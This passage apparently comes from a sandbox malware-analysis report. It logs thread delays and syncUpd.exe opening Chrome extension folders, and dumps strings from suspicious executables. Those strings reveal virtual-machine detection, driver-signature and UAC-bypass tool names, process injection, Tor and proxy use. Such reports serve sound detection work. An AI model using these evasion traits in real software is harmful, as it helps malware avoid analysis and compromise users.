                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590109
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589672
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 588734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 588468
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 587531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585843
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 585156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584684
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584373
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 584181
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 583093
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582906
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 582125
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 581234
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580962
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580553
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 580078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579764
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579608
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579418
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 579047
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 578062
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 577218
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576718
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 576203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 575390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 574890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 573625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 572172
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 571250
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 569531
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 567406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 566156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 565328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 564625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 563703
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 562890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 561281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 560609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 559609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 558734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 557781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 556687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 555359
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 554500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 553687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 550154
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 549123
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 548388
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 547285
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 546625
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 545943
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 544442
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 543574
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 542777
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 541993
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540668
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 540261
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 539466
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538740
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 538374
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537716
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537483
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 537249
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536944
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536694
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536376
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 536049
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535747
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535508
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535314
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 535010
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 534399
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000081D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001368000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: BroomSetup.exe, 00000014.00000002.3180389400.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#4&qk2
Source: svchost.exe, 00000002.00000002.3210421837.000002557D656000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3209219507.000002557D644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3183950183.000002557802B000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2149316478.0000000000845000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.0000000000845000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmp, weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000962000.00000004.00000020.00020000.00000000.sdmp, weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000878000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001424000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000B78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW:d
Source: InstallUtil.exe, 00000008.00000002.3175041380.0000000001565000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001424000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWm+
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareX
